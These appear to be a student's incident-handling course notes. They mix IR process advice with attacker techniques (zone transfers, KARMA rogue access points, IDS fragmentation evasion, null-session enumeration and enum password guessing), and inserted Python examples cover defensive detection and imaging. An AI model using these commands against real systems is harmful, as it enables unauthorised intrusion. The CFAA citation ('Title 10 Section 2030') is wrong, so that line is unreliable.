Hacker Techniques & Incident Handling Notes

Hacker Techniques, Exploits & Incident Handling
Notes written by Uma Mahesh Padisetty
✔ Always have handwritten notes
  o Whom you are meeting, what you asked, what commands you ran.
✔ Maybe have audio recorders with you.
  o Sometimes video recordings can have policy obligations.
✔ When you do the job, make sure management understands your value in the form of an incident handling summary, i.e., a slide of all incidents with graphs. For a quiet month, include information from others such as SANS to avoid budget cuts.
✔ We need to have the appropriate people on the team; it should have core experts in all disciplines:
  o Two from Unix, two from Windows,
  o Network management personnel, as we get a lot of info from routers and switches
  o In-house legal counsel
  o Sometimes we need HR for taking actions on humans
  o Disaster Recovery / BCP should not be the head of incident handling.
✔ Have system build checklists, i.e., the basic system build documents for those servers etc.
✔ In order to run the bridge calls, we need a list of contact info for all key personnel for emergency calls.
✔ Test your stuff periodically (not regularly.. they hate you).
Source of real-world incident scenarios: www.counterhack.net
Counter Hack PPT: http://www.cs.sjsu.edu/~stamp/CS286/ppt/
✔ Incident handlers sometimes need access to devices with admin privileges
  o Bargain with the Operations team.
✔ Provide a way for users to contact the incident handling team
  o Provide a hotline number, an email address, occasional alert mails.
  o We need a special climate-controlled room (say, a SOC)
✔ Always plan for backups of evidence
✔ Helpdesks are important; they are the eyes of the incident handling team
  o Educate helpdesk people to report specific incidents to us.
✔ Incident Response Kit – set of tools
  o Have a jump bag of hard disks to take backups.
  o Binary backup software – dd and windd
  o Netcat – move filesystem images across the network, take the output of certain commands
  o Forensic software
    Freeware – Sleuthkit, Autopsy
    Commercial tools – Guidance Software EnCase
  o Diagnosis software (sometimes a rootkit installed on the machine might lie to you regarding the bad guy, as the rootkit modifies the operating system itself. So carry your trustworthy set of tools on a CD or pen drive for diagnosis)
  o A good bootable Linux disk (e.g. Helix)
  o Use something like taps to capture. Can't use hubs or switches
    Cannot use on servers
    The bad guy can identify it as it is bidirectional
    Available from NetOptics (the USB-powered TAP is easy to use)
  o Cables (1 straight-through, 1 crossover cable, 1 USB-to-serial cable, 1 serial cable for routers, extra hard drive cable)
  o Laptop with multiple operating systems (at least virtual machines)
✔ Interview the operations people with open-ended questions like
    what recent changes were made to the firewall?
    what recent configurations?
    what patches?
    any scripts executed?
✔ Involve your peers in handling the incident and have everyone maintain notes. Also involve the necessary people such as the administrator, business manager, risk manager, client POC, etc.
✔ Network perimeter detection
    tcpdump -n
✔ Host perimeter detection
    Firewall logs
    netstat -an
    Virus Response Tool Kit (LiveIR)
    System administrator cheat sheets (for Windows and Linux) are some commands that system administrators use to find any anomalies.
Session 2 – Slides: "Not 'If' but 'When': Essential Incident Handling Techniques for System Administrators", John Ives (jives@security.berkeley.edu), System and Network Security
• sc – service controller; also services.msc, msconfig, net view etc.
• at – to check what jobs are scheduled; Process Explorer from Sysinternals
• Netcat – to transfer data across TCP and UDP ports
• We have to create a chain of evidence (a record of collection events) on a document. E.g., when a law enforcement officer asks for a hard drive, ask for proof (mail, fax) and then send a copy of the real one.

• Preparation
• Identification
• Containment:
  o Short-term containment: pause the attacker temporarily without changing the configuration the attacker made, i.e., block the network or port, isolate the machine.
    Maintain a good relationship with the management sponsor, who will provide resources and remove blockers. The management sponsor can be the LIRM or SDM – notify him.
    Coordinate with network personnel to isolate the machine from the network. It can be done by pulling the LAN cable from the machine or blocking the switch port attached to the machine.
    Usually bad guys hit an IP address. Change the IP in the DNS servers so that your customers come to your actual service while the bad guy tries to hit the old machine. It helps until we get some information. The problem is convincing management.
    Maintain a low profile while investigating. Do not do reconnaissance from the infected machine. If needed, do it from another machine (lab).
    Back up the machine (create images – use dd, WinDD etc. from a live CD).
    How do you deal with filesystems of terabytes of data? Usually such devices have RAID mirroring, so there is a button to synchronize the mirror. Here you go: push the button and take it.
    Using built-in backup software.
    Copy only the system partition where the OS resides, and the logs.
    Use some tool for logging the incidents that provides an incident number.
    E.g.: RTIR (Real Time Incident Response) - http://bestpractical.com/rtir/
    BlackThorn - http://www.qccis.com/blackthorn
  o Long-term containment and eradication:
    remove/disable accounts
    shut down/remove backdoors
    change passwords
• Eradication
• Recovery
• Lessons learnt
<<checkout the slides>>
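The "back up the machine" step and the chain-of-evidence note above both come down to the same routine: image the disk, hash what was read and what was written, and record who did it and when. This is an added example, not code from the notes or the course; it is a Python stand-in for dd with a hash check, and the device path, case id and handler name are placeholders.

```python
"""Evidence imaging with an integrity check and a custody log entry.

Equivalent of `dd if=/dev/sdX | tee image.dd | sha256sum`, written out so the
hash of the bytes read from the source and the hash of the image on disk are
both recorded.  Added example; paths and identifiers below are placeholders.
"""
import hashlib
import json
import os
from datetime import datetime, timezone

BLOCK_SIZE = 1024 * 1024  # 1 MiB per read, like dd bs=1M


def image_device(src_path, dst_path, block_size=BLOCK_SIZE):
    """Copy src_path to dst_path block by block.
    Returns (sha256 of the bytes read from the source, byte count)."""
    h = hashlib.sha256()
    total = 0
    with open(src_path, "rb") as src, open(dst_path, "wb") as dst:
        while True:
            chunk = src.read(block_size)
            if not chunk:
                break
            h.update(chunk)
            dst.write(chunk)
            total += len(chunk)
        dst.flush()
        os.fsync(dst.fileno())  # make sure the image really reached the disk
    return h.hexdigest(), total


def sha256_file(path, block_size=BLOCK_SIZE):
    """Independently re-hash a file on disk (used to verify the image)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(block_size), b""):
            h.update(chunk)
    return h.hexdigest()


def acquire(src_path, dst_path, log_path, case_id, handler, note=""):
    """Image src_path to dst_path, verify the copy, append a custody record.
    Returns the record; raises if the image does not match the source."""
    src_hash, nbytes = image_device(src_path, dst_path)
    img_hash = sha256_file(dst_path)
    if img_hash != src_hash:
        raise RuntimeError("image hash %s != source hash %s" % (img_hash, src_hash))
    record = {
        "case_id": case_id,
        "handler": handler,
        "when_utc": datetime.now(timezone.utc).isoformat(),
        "source": src_path,
        "image": dst_path,
        "bytes": nbytes,
        "sha256": src_hash,
        "note": note,
    }
    with open(log_path, "a") as log:  # one JSON line per acquisition
        log.write(json.dumps(record) + "\n")
    return record


if __name__ == "__main__":
    # Constructed demo: a random file stands in for the block device
    # (in real use src would be something like /dev/sdb, a placeholder here).
    import tempfile
    work = tempfile.mkdtemp()
    fake_disk = os.path.join(work, "fake_disk.bin")
    with open(fake_disk, "wb") as f:
        f.write(os.urandom(3 * 1024 * 1024 + 123))
    rec = acquire(fake_disk, os.path.join(work, "evidence.dd"),
                  os.path.join(work, "custody.jsonl"),
                  case_id="IR-EXAMPLE-001", handler="handler name",
                  note="web server disk, imaged after isolation")
    print(json.dumps(rec, indent=2))
```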

Ask open-ended questions. Do not ask yes/no questions.

Espionage: Espionage or spying involves an individual obtaining information that is considered secret or confidential without the permission of the holder of the information.
Tip#1: When handling such cases, use trusted people.
Tip#2: Try target analysis of our own organization.
Tip#3: To generate an event while critical documents are transferred, assign a unique serial number to them so that Google can bring it up; use some signature so the IDS can identify the transfer.
Tip#4: Always have access to various logs, not just device logs but physical logs such as datacenter entry login/logout, call records of a person, surveillance videos etc.

Unauthorized use:
Tip#1: Organizational Reconnaissance.

Phone phishing:
The email states that your account has a problem, please call the number to fix it. The number goes to VoIP and a phishing IVR of the "bank" asking you to input your account number and PIN for authentication.

Inappropriate web access:
Pull the proxy logs (but do it only if HR asks in writing, not when a manager asks).
Bluecoat, SurfControl etc. can block unwanted sites categorized as pornography, malware sources etc.

Insider threat:
It could be a contractor, business partner or employee.
It can be destructive or non-destructive (which doesn't mean not damaging: they copy data and take it out).
They might plant logic bombs.
A warning banner helps prevent insider threat. Always get authorization from HR when monitoring a suspicious person; otherwise they might sue you.
Ask open-ended questions…

Intellectual property theft:
Patents: protect innovations
Copyrights: protect specific expressions of ideas, content
Trademarks: protect brands
Confusion attack: using the same fonts and colors to confuse the original with a duplicate, e.g. Microsoft and Microsaft.
Trade secret protection: things from which we derive economic value because they are secret. Provides various penalties for violation. Protects against theft.
How to identify a breach of intellectual property?
To prove theft and an intellectual property violation, we need to show that we made adequate efforts to protect it.

Law, Crime and Evidence
Three Domains:

US Federal Law:
Title 10 Section 2030: Computer Fraud and Abuse Act
1) Computers working for the government
2) Computers associated with infrastructure
3) Computers associated with e-commerce
The law applies only if damage > $5000
DAY 2
Session 1
Talks about vulnerabilities, disclosures and complications
• Whenever a vulnerability is found, it is advised to contact the vendor and go public when they patch it, or after a timeframe of 90 days (mostly) or even 180 days. If the vulnerability was found via reverse engineering, you could be sued under the DMCA.
• TippingPoint will buy the vulnerabilities.
• Send the vulnerability via a proxy like US-CERT or SANS ISC.
• Hacktivism: hacking to make a political point.
  Create malware → create a botnet → rent the botnet (e.g. for hacktivism)
• Scareware, fake codecs – drive-by downloads
How does a hacker start attacking?
Reconnaissance
• Whois – one can get contact information for the domain
  Find out the registrar associated with the domain; the registrar would provide details.
  Sometimes the IP can be a block of IPs; it can be the ISP.
  http://yehg.net/lab/pr0js/misc/wsa.php
  Sometimes when the contact is a person, social engineering can be played on him for reconnaissance.
  P.S.: There are some anonymous registrars who will not put up the owner's information. This will slow down the contacting process.
• DNS interrogation: bad guys always want to have as many records as possible. Zone transfers – the hacker's way to get the most out of DNS. A zone transfer is used to transfer DNS records from the primary NS to the secondary NS; however, hackers exploit it to collect the DNS records. There are Perl scripts (found on BT) for DNS enumeration; dig can be used for a zone transfer:
  Get the name server
  #dig counterhack.com
  <<provides the name server of counterhack.com>>
  Ask the name server for the domain using AXFR (or IXFR)
  #dig @ns1.highland-parking.net counterhack.com axfr
  [As a security feature, most name servers will have disabled it]
  nslookup on Windows serves the same purpose.
  Usually an organization keeps secondary and tertiary NS with the ISP, and those may support zone transfers. Send a mail to the ISP to block it.
  DNS is highly critical infrastructure; always harden it.
  Identification of DNS compromise:
  Look for zone transfers – normal DNS uses UDP 53 while zone transfers use TCP 53.
  Also a DNS response bigger than 512 bytes.
  Also a DNS request bigger than 512 bytes can be a buffer overflow attack.
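The three indicators just listed (TCP/53 from a host that is not a known secondary, and UDP DNS messages over 512 bytes in either direction) can be checked mechanically over connection records. This is an added example, not from the notes: the flow-log line layout it parses is an assumption made for the example, and the sample log is constructed. EDNS0 legitimately allows UDP messages above 512 bytes, so treat the size hits as triage leads, not verdicts.

```python
"""Flag DNS flows matching the zone-transfer / oversized-message indicators.

Input: constructed flow records, one per line (layout assumed for this example):
    <time> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <bytes>
"""
import re
from collections import namedtuple

Flow = namedtuple("Flow", "ts proto src sport dst dport nbytes")

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>tcp|udp)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<nbytes>\d+)$", re.I)

DNS_PORT = 53
MAX_UDP_DNS = 512  # classic UDP DNS payload limit from the notes


def parse_flow(line):
    """Parse one record; return a Flow or None for comments/garbage."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Flow(m["ts"], m["proto"].lower(), m["src"], int(m["sport"]),
                m["dst"], int(m["dport"]), int(m["nbytes"]))


def classify(flow, authorized_secondaries=frozenset()):
    """Return the list of indicator names one flow triggers (empty = nothing odd)."""
    hits = []
    if DNS_PORT not in (flow.sport, flow.dport):
        return hits
    to_server = flow.dport == DNS_PORT
    # TCP to port 53 is what AXFR/IXFR uses; allow it only from known secondaries.
    if flow.proto == "tcp" and to_server and flow.src not in authorized_secondaries:
        hits.append("tcp53-from-unauthorized-host")
    # UDP DNS messages larger than 512 bytes, either direction.
    if flow.proto == "udp" and flow.nbytes > MAX_UDP_DNS:
        hits.append("oversized-dns-query" if to_server else "oversized-dns-response")
    return hits


def scan_log(text, authorized_secondaries=frozenset()):
    """Run classify() over every parsable line; return [(flow, hits)] for flows with hits."""
    findings = []
    for line in text.splitlines():
        flow = parse_flow(line)
        if flow is None:
            continue
        hits = classify(flow, authorized_secondaries)
        if hits:
            findings.append((flow, hits))
    return findings


# Constructed sample: 10.0.0.53 is our name server, 10.0.0.54 its authorized secondary.
SAMPLE_LOG = """\
# constructed sample flow log
12:00:01 udp 10.0.0.7:51234 -> 10.0.0.53:53 64
12:00:01 udp 10.0.0.53:53 -> 10.0.0.7:51234 180
12:00:05 tcp 10.0.0.54:43210 -> 10.0.0.53:53 2200
12:00:09 tcp 198.51.100.9:40001 -> 10.0.0.53:53 5120
12:00:12 udp 198.51.100.9:40002 -> 10.0.0.53:53 1400
12:00:13 udp 10.0.0.53:53 -> 10.0.0.7:51240 4096
"""

if __name__ == "__main__":
    for flow, hits in scan_log(SAMPLE_LOG, frozenset({"10.0.0.54"})):
        print("%s %s %s:%d -> %s:%d %d bytes  %s" % (
            flow.ts, flow.proto, flow.src, flow.sport, flow.dst, flow.dport,
            flow.nbytes, ",".join(hits)))
```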
• Website searches: press releases, job openings, business partners, phishing attacks on employees
Defences:
• Preparation:
  Look at your own websites
  See what your employees talk about in newsgroups
  Make job opening descriptions generic
  Identify web crawler activity from the logs
• Google searches:
  Johnny Long – Using Google for Penetration Testing
  phonebook: James Smith – Google provides a phone book search (US only)
  Directory – search only from this site
  site: isc.sans.com – search only from this site
  link: wikihead.wordpress.com – shows everything that links to that site
  intitle: Honeypot Indepth – search for the keywords in the title. Sometimes the files on the server are listed with the title "Index", hence "site:domain.com intitle:index"
  inurl: robots.txt – search for the term in URLs. Helps identify critical files like the one shown.
  wikihead -malware – the minus discards the term "malware" from the search
  + – Google strips out common words, e.g. 'X and Y' strips out "and", so use X+and+Y
  X.Y – the dot matches one character
  Google cache: contains an image of the website from Google's servers. Helps to view deleted contents on the site. P.S.: data in the Google cache can be removed using Google Webmaster Tools.
  Language translation: http://translate.google.com – browse the website through Google Translate. You can browse anonymously… (not ultimately anonymous)
  filetype: pdf – reports only PDF files with the given search terms
  ext:rdp – shows .rdp files (Remote Desktop files)
  GHDB – Google Hacking Database
  robots.txt – lists the files or folders that should not be crawled
  [Honeypot use: check the IP that accessed a file mentioned in robots.txt… it is a malicious bot]
  noindex, noarchive, nosnippet etc. written to robots.txt can prohibit the Google bot from capturing unwanted info on the server.
  User Agent Switcher: a Firefox plugin to change the User-Agent of a web request.
  Google URL crawl request form: Google crawls the site again from scratch, from the root.
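The robots.txt honeypot idea above (anyone who fetches a path that robots.txt disallows is a misbehaving crawler or someone reading robots.txt for targets) is easy to automate over web server logs. Added example, not from the notes: the robots.txt, the decoy path and the access log lines are constructed, and the log format assumed is the common Apache/Nginx "combined" layout.

```python
"""robots.txt as a tripwire: report clients requesting disallowed paths."""
import re

# Constructed robots.txt; /private-reports/ is a decoy that does not exist on the site.
ROBOTS_TXT = """\
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /private-reports/   # decoy: nothing real lives here
Allow: /public/
"""

# Constructed access log in combined format (IPs are documentation ranges).
ACCESS_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /robots.txt HTTP/1.1" 200 98 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /private-reports/ HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /backup/db.sql HTTP/1.1" 404 153 "-" "Mozilla/5.0"
66.249.66.1 - - [10/Oct/2023:13:56:01 +0000] "GET /robots.txt HTTP/1.1" 200 98 "-" "Googlebot/2.1"
66.249.66.1 - - [10/Oct/2023:13:56:02 +0000] "GET /public/index.html HTTP/1.1" 200 5120 "-" "Googlebot/2.1"
198.51.100.7 - - [10/Oct/2023:14:01:10 +0000] "GET /admin/login HTTP/1.1" 200 800 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"')


def disallowed_prefixes(robots_text):
    """Collect Disallow prefixes from records that apply to 'User-agent: *'.
    Comments are stripped; a blank line or a new User-agent group after rules
    starts a new record."""
    prefixes = []
    agents, in_rules = [], False
    for raw in robots_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            agents, in_rules = [], False
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if in_rules:
                agents, in_rules = [], False
            agents.append(value)
        elif field in ("disallow", "allow"):
            in_rules = True
            if field == "disallow" and value and "*" in agents:
                prefixes.append(value)
    return prefixes


def parse_access_line(line):
    """Return the fields of one combined-format log line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def tripwire_hits(log_text, prefixes):
    """Return {ip: {"fetched_robots": bool, "hits": [(ts, path, ua), ...]}}
    for every client that requested something under a disallowed prefix."""
    seen = {}
    for line in log_text.splitlines():
        rec = parse_access_line(line)
        if rec is None:
            continue
        entry = seen.setdefault(rec["ip"], {"fetched_robots": False, "hits": []})
        path = rec["path"].split("?", 1)[0]
        if path == "/robots.txt":
            entry["fetched_robots"] = True  # they read the map first
        elif any(path.startswith(p) for p in prefixes):
            entry["hits"].append((rec["ts"], path, rec["ua"]))
    return {ip: e for ip, e in seen.items() if e["hits"]}


if __name__ == "__main__":
    prefixes = disallowed_prefixes(ROBOTS_TXT)
    for ip, entry in tripwire_hits(ACCESS_LOG, prefixes).items():
        print(ip, "read robots.txt" if entry["fetched_robots"] else "",
              [p for _, p, _ in entry["hits"]])
```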
• SamSpade – a simple tool for whois, DNS, tracert etc. for reconnaissance. It has a web crawler.
  wget -r [web crawling for local mirroring]
SCANNING
• War dialing:
  Phone sweep: dial the numbers in sequence.
  Nudge string: replay a pattern of signals when a modem is found (modem-style attack).
  Remediation: use modems only if the vendor has a strong requirement; even if used, ask for strong user IDs and passwords.
  Conduct a war dialing exercise.
  [There are voice IPSs which detect war dialing and block the calls to a modem if it is vulnerable]
  As an IR member, you should have contact with the person who can tell you where the phone line ends inside the company.
• NetStumbler: a good war-dialing-style tool for wireless access points (war driving). If WEP is used, capturing some packets can crack the keys.
• Aircrack-ng: a superb one to crack WEP keys.
SESSION 2
• KARMA - http://www.wirelessdefence.org/Contents/KARMAMain.htm
  KARMA is a set of tools for assessing the security of wireless clients at multiple layers.
  1. It passively sniffs 802.11 probe request packets and thereby discovers clients.
  2. From the packets, it extracts what network the clients want to connect to (I guess it would be the SSID).
  3. KARMA includes patches for the Linux MADWifi driver to allow the creation of an 802.11 access point that responds to any probed SSID.
  4. It starts the services ACCESS-POINT, DNS-SERVER, DHCP-SERVER, FTP-SERVER.
  5. When the user wants to connect to the internet via the SSID, KARMA acts as a man-in-the-middle, assigns a DHCP IP to the victim and captures all the traffic. It acts as a fake DNS and FTP server to capture credentials and returns nothing.
  karma-lan.xml - "This configuration runs a rogue DHCP, DNS and HTTP services on an existing (wired) network connection. The HTTP service redirects all requests to ExampleWebExploit module that displays simple HTML page"
  Usage:
  cd /tools/wifi/karma-20060124
  bin/monitor-mode.sh ath0
  bin/karma etc/karma-lan.xml
• ASLEAP – exploits the Cisco LEAP protocol http://www.wirelessdefence.org/Contents/AsleapMain.htm
  The Lightweight Extensible Authentication Protocol (LEAP) is a proprietary wireless LAN authentication method developed by Cisco Systems. Important features of LEAP are dynamic WEP keys and mutual authentication (between a wireless client and a RADIUS server). LEAP allows clients to reauthenticate frequently; upon each successful authentication, the clients acquire a new WEP key (with the hope that the WEP keys don't live long enough to be cracked). LEAP may be configured to use TKIP instead of dynamic WEP.
  The password itself is not transmitted while authenticating; instead a hash derived from it is transmitted over the air for authentication. There is a weakness which is exploited by using a dictionary attack against those transmitted hashes to retrieve WEAK PASSWORDS.
• A simple defense strategy employed is MAC filtering at the AP… Oh… MAC addresses are spoofable. Just sniff the MAC from packets and use it when the legitimate machine is offline.
• WPA2 is a stronger access authentication mechanism.
• Attacking aggressive-mode IKE, which is used for wireless VPN connections, is easy: it is easily crackable. Aggressive mode takes shortcuts to improve performance by avoiding rekeying.
IKE Aggressive Mode:
In IKE aggressive mode the authentication hash based on a pre-shared key (PSK) is transmitted as the response to the initial packet of a VPN client who wishes to establish an IPsec tunnel. This hash is not encrypted. A packet sniffer (e.g. tcpdump) can be used to capture these hashes, and a dictionary or brute-force attack can be used against the hash to recover the PSK.
This attack only works in IKE aggressive mode because in IKE main mode the hash is already encrypted. Based on this fact, we can learn that IKE aggressive mode is not very secure.
Tool: IKECRACK - http://ikecrack.sourceforge.net/
Hence the tip is: disable aggressive-mode IKE.
Proof of concept: http://www.ernw.de/download/pskattack.pdf
• Cisco APs have an integrated security mechanism and can also assist by jamming the rogue machine. But it is problematic as it can jam any machines in the vicinity that belong to another company. Mostly jamming is legally banned and will not be used. I believe the other party can sue you.
• There are some WIPS such as AirMagnet, AirDefense
WIRELESS LAN security policies
• WEP shouldn't be used
• Disable aggressive-mode IKE
• When jammers are used, put up a sign board notifying the same
<<Working with NETSTUMBLER>>
Is war driving with NetStumbler legal?
Ans: It depends…..
Since it sends BEACONs and receives responses, it is advised to disable DHCP.
Passive sniffing is legally wrong as it might violate their privacy.
Network mapping:
We need to get the topology.
Cheops-NG: http://www.digipedia.pl/man/doc/view/cheops-ng.1/
It is a simple tool that provides network mapping by using host discovery and also port discovery on the machines. It uses ping and traceroute for network mapping:
  Sending a traceroute packet with TTL = 1, I get the first-hop machine
  Sending a traceroute packet with TTL = 2, we get the second-hop machine
Features:
• Host discovery - uses ICMP ping packets
• Machine fingerprinting to determine OS (using Nmap) - runs an nmap command to determine the OS fingerprint
• Use of DNS and ICMP to detect network hosts
• Network mapping - mapping is done using UDP (or optionally ICMP) packets with small time-to-live values (traceroute and mtr, respectively)
Usage:
1. First start the Cheops agent on the machine
   #cheops-agent &
2. Connect to the Cheops agent
   #cheops-ng
3. Enter the IP of the machine on which cheops-agent is running.. currently it is localhost
4. Add a host in the workspace.. just one target machine
Recommendations
✔ Usually corporations block pings.
✔ Also block outgoing ICMP packets.
>>>Simple Details on TCP, UDP Headers<<<
Port scanner – Nmap: http://www.insecure.org/presentations/Shmoo06/
(Nmap on Windows is not reliable due to the non-robust TCP/IP stack in Windows)
Defenses
● Disable all ports until there is a business need
● Periodically check the rule base for its need
Tools:
Windows:
  netstat -a
  netstat -ab --- lists all details of DLLs and processes that are connected
  TCPView
  WMIC (Windows Management Instrumentation Command-line)
Linux:
  lsof (list open files)
  lsof -i --- shows open connections
  lsof --- lists all open files of all applications
  kill – kills a process
  chkconfig – used to manage which services load in each runlevel
  chkconfig --list [name]
  chkconfig --add name
  chkconfig --del name
  chkconfig [--level levels] name <on|off|reset>
  E.g.: chkconfig --add xinetd
        chkconfig --level 5 xinetd off
Exercise
Do a TCP scan, decoys, SYN stealth scan, connect scan
To check outgoing packets – tcpdump -lio
Version scanning
Why not a connect scan with a decoy scan?
Passive fingerprinting
p0f v2
NetworkMiner - http://networkminer.sourceforge.net/
It can also pull out transferred files and clear-text contents from the dump files. Very nice tool.
Determining firewall rules
✔ Using ICMP instead of UDP for traceroute can reveal info about the devices behind the firewall, as ICMP may not be blocked by the firewall:
  #traceroute -I 10.9.23.1
✔ UDP port 53 is usually unblocked at the firewall since it is needed for DNS queries/responses. Hence we need to fool the firewall. Normal traceroute increments the port number monotonically with each probe, and three probes are sent to each hop. So in order to send a packet that has port 53 at the firewall, we have to set the initial port number to TargetPort – (number_of_hops × number_of_probes) – 1, i.e., 53 – (8 × 3) – 1 = 28 [suppose the number of hops before reaching the gateway is 8]
  #traceroute -p28 10.9.23.1
  This will only give info about the device just after the gateway :(
  Instead, stop the incrementing:
  #traceroute -S -p53 20.9.23.1
Layer Four Traceroute (lft)
It determines what packets are allowed through the firewall.
Firewalk - http://packetstormsecurity.org/UNIX/audit/firewalk/firewalk-0.99.1.tar.gz
It employs traceroute-like techniques to analyze IP packet responses to determine gateway ACL filters and map networks. Firewalk, the tool, employs the technique to determine the filter rules in place on a packet forwarding device.
In order to use a gateway's response to gather information, we must know two pieces of information:
• The IP address of the last known gateway before the firewalling takes place
• The IP address of a host located behind the firewall.
Using proxy servers can eliminate firewalking.
Some NIDS also detect firewalking.
Vulnerability scanning
These vulnerability scanners detect only known vulnerabilities and do not identify zero-day vulns. Hence it is always advised to have multiple layers of security. As an exercise, just take the topology of the DMZ and assume that one machine is compromised by a zero-day vulnerability. Then think of the solution.
Nessus
They generate huge reports which are hard to understand. It also does not do correlation or cross-correlation.
Nessus has plugins, where each plugin performs one test on the target environment.
NASL (Nessus Attack Scripting Language) – used to create plugins
Architecture:
The Nessus client communicates with the Nessus daemon (server) and tells it to do the scan.
NessJ – a Java-based Nessus client that presents results in an understandable format
Dangerous plugins – can cause damage to the end system (like DoS-based plugins for checking vulns)
1. Install Nessus
2. Create a certificate
   #nessus-mkcert
3. Add a user
   #nessus-adduser
4. Start the Nessus server daemon
   #nessusd -D
5. Start the Nessus client
   #nessus
6. The Nessus GUI is displayed; log in and start the scan
7. It is advised to run updates periodically
   #nessus-update-plugins
WebApp scanners
They know about known CGI vulnerabilities, Active Server Pages vulnerabilities etc.
E.g.: AWStats vulnerabilities, phpBB vulnerabilities
Nikto WebApp scanner – a free tool written in Perl.
• It will look for CGI files for vulnerabilities
• It looks into robots.txt
• It has a port scanner
• It has application-level IDS evasion
• Supports web authentication
• Supports SSL; it has mutation functionality
Wikto – a similar tool with a GUI that includes Google Hacking DB support.
IDS evasion
• Packet fragmentation – the technique is used to evade detection.
  In the IP header:
  DF bit – Don't Fragment
  MF bit – More fragments are coming
  Fragment offset – used for reassembly
  The IP ID value is used to assemble the fragments
  However, wireline IDSs detect these attacks using virtual packet reassembly buffers. Unfortunately, wireless IDSs do not detect fragmented packets, and they can easily pass through.
  • Sending small packet fragments (session splicing)
  • Pausing between fragments so that the IDS times out but the host machine does not
  • Overlapping fragments - for example, the first packet includes 80 bytes of payload but the second packet's sequence number is 76 bytes after the start of the first packet. When the target computer reassembles the TCP stream, it must decide how to handle the four overlapping bytes. Some operating systems take the older data, and some take the newer data.
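Why the overlap matters to the defender: the same two segments reassemble to different byte streams under the two policies just named, so an IDS that does not reassemble with the target host's policy inspects a payload the host never sees. Added example, not from the notes: a small stream reassembler with an "older data wins" and a "newer data wins" policy, fed constructed segments that reproduce the 80-byte / 76-byte-offset case above.

```python
"""TCP segment overlap: the same segments under two reassembly policies."""


def reassemble(segments, policy):
    """segments: list of (seq_offset, bytes) in arrival order.
    policy 'first': bytes already placed are kept (older data wins).
    policy 'last':  later segments overwrite (newer data wins).
    Returns the contiguous stream from offset 0 up to the first hole."""
    if policy not in ("first", "last"):
        raise ValueError("policy must be 'first' or 'last'")
    stream = {}  # byte offset -> byte value
    for seq, data in segments:
        for i, b in enumerate(data):
            off = seq + i
            if policy == "last" or off not in stream:
                stream[off] = b
    out = bytearray()
    off = 0
    while off in stream:  # stop at the first missing byte
        out.append(stream[off])
        off += 1
    return bytes(out)


def reassembly_views(segments):
    """Return {policy: stream} so the two host behaviours can be compared."""
    return {p: reassemble(segments, p) for p in ("first", "last")}


# Constructed segments: SEG1 carries 80 bytes (offsets 0..79), SEG2 starts at
# offset 76, so offsets 76..79 are sent twice with different content.
HEAD = b"GET /cgi-bin/app?cmd="
SEG1 = (0, HEAD + b"x" * (80 - len(HEAD) - 4) + b"ping")
SEG2 = (76, b"pong HTTP/1.0\r\n\r\n")
SEGMENTS = [SEG1, SEG2]

if __name__ == "__main__":
    for policy, stream in reassembly_views(SEGMENTS).items():
        print("%-5s policy ->" % policy, stream)
```

A sensor that picks the wrong policy for a given target sees `cmd=...ping` while the host executes `cmd=...pong`, or vice versa.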
FragRouter (some IDSs give you the option to block fragmented packets, although it is not recommended; check before blocking):
• Runs on Unix/Linux systems
• Provides over 35 different schemes for fragmenting the flow of data
• Separates the attack functionality from the fragmentation functionality
Some fragmentation types:
• Sends data in ordered 8-byte fragments
• Sends data in ordered 24-byte fragments
• Sends data in ordered 8-byte fragments with one fragment out of order
• Completes the TCP handshake, sends a fake FIN and RST (with bad checksums) before sending data in ordered 1-byte fragments
Obfuscating the attack payload
Send the data such that the IDS cannot understand it but the victim machine can, viz. using Unicode encoding, attacking via HTTPS (usually backdoors planted by an attacker work under HTTPS).
Inserting traffic at the IDS
Send traffic such that only the IDS sees it and determines state for a machine, but the packet never actually reaches the end machine. I.e., send a RST packet with a low TTL value so that it expires after reaching the IDS, or send a packet with a bad checksum so that the end machine discards it.
Gaining Windows data through null sessions [enumeration]
The most powerful account on the machine is SYSTEM [not Administrator].
A null session is an anonymous request that comes in saying "I am nobody, coming from nowhere, please give me some data".
With a null session, hackers can call APIs and use remote procedure calls to enumerate information. These techniques can, and will, provide information on passwords, groups, services, users and even active processes. Null session access can also be used for escalating privileges and performing DoS attacks.
Information usually enumerated by intruders:
• Network resources and shares
• User accounts and groups
• Applications
Anyone with a NetBIOS connection to your computer can easily get a full dump of all your usernames, groups, shares, permissions, policies, services and more using the null user. Just check for open ports 139 and 445 on your machine, which are the NetBIOS/SMB ports; almost 90% of machines have them open.
Sample hack using a NetBIOS null session:
1. Impacket samrdump – an application that communicates with the Security Account Manager Remote interface from the DCE/RPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.
   bt smb-enum # samrdump.py guest:''@192.168.1.104 139/SMB
   Retrieving endpoint list from 192.168.1.104
   Trying protocol 139/SMB...
   Found domain(s):
   . YOUR-O1N9OY17SK
   . Builtin
2. DumpSec – dumps information about system users, file system, registry, permissions, password policy and services
3. Enum – a simple console-based tool that can be used in scripts
   #enum -u --- lists users
   #enum -g --- lists groups
   #enum -s --- lists shares
   #enum -p --- lists the password policy
   C:\> enum -D -u <username> -f <dictionary>
   dictionary is a file containing a list of passwords, which can be obtained from any password cracking tool
   Download link for Windows: http://www.indianz.ch/tools/scan/enum.zip
4. WinFingerprint
Having established a session
